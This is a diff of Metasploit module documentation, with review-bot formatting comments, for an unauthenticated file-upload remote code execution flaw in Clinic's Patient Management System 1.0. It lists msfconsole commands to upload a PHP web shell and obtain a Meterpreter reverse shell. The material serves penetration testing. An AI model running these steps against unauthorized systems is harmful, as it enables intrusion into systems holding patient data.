documentation/modules/exploit/multi/http/clinic_pms_fileupload_rce.md
Lines changed: 24 additions & 19 deletions
@@ -1,5 +1,9 @@
1
-
## Description
2
-
The Clinic's Patient Management System (CPMS) 1.0 is vulnerable to unauthenticated Remote Code Execution (RCE) due to a file upload vulnerability. This exploit allows an attacker to upload arbitrary files, such as a PHP web shell, which can then be executed remotely. The exploitation occurs because of a misconfiguration in the server, specifically a lack of file validation for uploads and the presence of a directory listing feature in `/pms/user_images`. This enables an attacker to upload a PHP file and access it via a publicly accessible URL, executing arbitrary PHP code.
1
+
## Vulnerable Application
2
+
The Clinic's Patient Management System (CPMS) 1.0 is vulnerable to Unauthenticated Remote Code Execution (RCE) due to a file upload vulnerability.
3
+
This exploit allows an attacker to upload arbitrary files, such as a PHP web shell, which can then be executed remotely.
4
+
The exploitation occurs because of a misconfiguration in the server, specifically a lack of file validation for uploads and the presence of
5
+
a directory listing feature in `/pms/user_images`.
6
+
This enables an attacker to upload a PHP file and access it via a publicly accessible URL, executing arbitrary PHP code.
3
7
4
8
## Verification Steps
5
9
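Review bot: new lines 4 and 5 of the `## Vulnerable Application` section break a single sentence in the middle ("...and the presence of" / "a directory listing feature in `/pms/user_images`."); Markdown joins them into one paragraph, but wrapping at sentence boundaries, as the other new lines already do, keeps the source readable and later diffs reviewable. Two smaller points: "Unauthenticated Remote Code Execution" is now capitalized where the removed text had "unauthenticated", and the Metasploit module documentation template expects `## Vulnerable Application` to also say where the affected version can be obtained and how to set it up, which this file still leaves to the setup items under Verification Steps (the `apache2.conf` and "Extract the downloaded source code zip file" lines visible in the next hunk).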
@@ -21,43 +25,48 @@ The Clinic's Patient Management System (CPMS) 1.0 is vulnerable to unauthenticat
21
25
- [ ] Edit `/etc/apache2/apache2.conf` by appending this line: `Include /etc/phpmyadmin/apache.conf`
22
26
- [ ] Extract the downloaded source code zip file into "/var/www/html" directory
23
27
- [ ] Next steps are similar to the ones for Windows, so follow that
24
-
28
+
25
29
2. Start `msfconsole` and load the exploit module:
26
-
```bash
30
+
```bash
27
31
msfconsole
28
32
use exploit/multi/http/clinic_pms_fileupload_rce
29
-
```
33
+
```
30
34
31
35
3. Set the required options:
32
-
```bash
36
+
```bash
33
37
set rport <port>
34
38
set rhost <ip>
35
39
set targeturi /pms
36
-
```
40
+
```
37
41
38
42
4. Check if the target is vulnerable:
39
-
```bash
43
+
```bash
40
44
check
41
-
```
45
+
```
42
46
43
47
If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
44
-
```
48
+
```
45
49
[+] <IP> The target is vulnerable.
46
-
```
50
+
```
47
51
48
52
5. Set up the listener for the exploit:
49
-
```bash
53
+
```bash
50
54
set lport <port>
51
55
set lhost <ip>
52
-
```
56
+
```
53
57
54
58
6. Launch the exploit:
55
-
```bash
59
+
```bash
56
60
exploit
57
-
```
61
+
```
58
62
59
63
7. If successful, you will receive a PHP Meterpreter shell.
60
64
65
+
## Options
66
+
-`TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).
67
+
-`LISTING_DELAY`: (Optional) The time to wait before fetching the directory listing after uploading the shell (default: `2` seconds).
68
+
69
+
61
70
## Scenarios
62
71
63
72
### Clinic's Patient Management System on a Linux Target
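Review bot: the relocated `## Options` entries at new lines 66 and 67 have no space after the list marker ("-`TARGETURI`: ..." and "-`LISTING_DELAY`: ..."), so Markdown will not render them as bullets; the copy removed from the end of the file used "- `TARGETURI`", so restore that form here. New lines 68 and 69 also leave two blank lines before `## Scenarios` where one is enough. The paired -/+ lines on the fences (the ```bash opening lines and the closing ```) show no visible difference in the rendered diff, so the change is presumably indentation; if the intent is to nest the fences under the numbered steps, make sure every fence in the list gets the same indentation so all of them render inside their list item.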
@@ -105,7 +114,3 @@ OS : Windows NT DESKTOP-VE9J36K 10.0 build 19045 (Windows 10) AMD64
105
114
Meterpreter : php/windows
106
115
meterpreter >
107
116
```
108
-
109
-
## Options
110
-
- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).
111
-
- `LISTING_DELAY`: (Optional) The time to wait before fetching the directory listing after uploading the shell (default: `2` seconds).
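Review bot: this hunk ends on a removed line with no trailing context, so after the change the file ends immediately after the closing ``` of the Windows scenario; make sure the final newline is kept so the file does not end mid-line. The deleted entries are the correctly formatted bullets ("- " followed by the option name), so the copy re-added before `## Scenarios` should match them character for character rather than switch to a different list syntax.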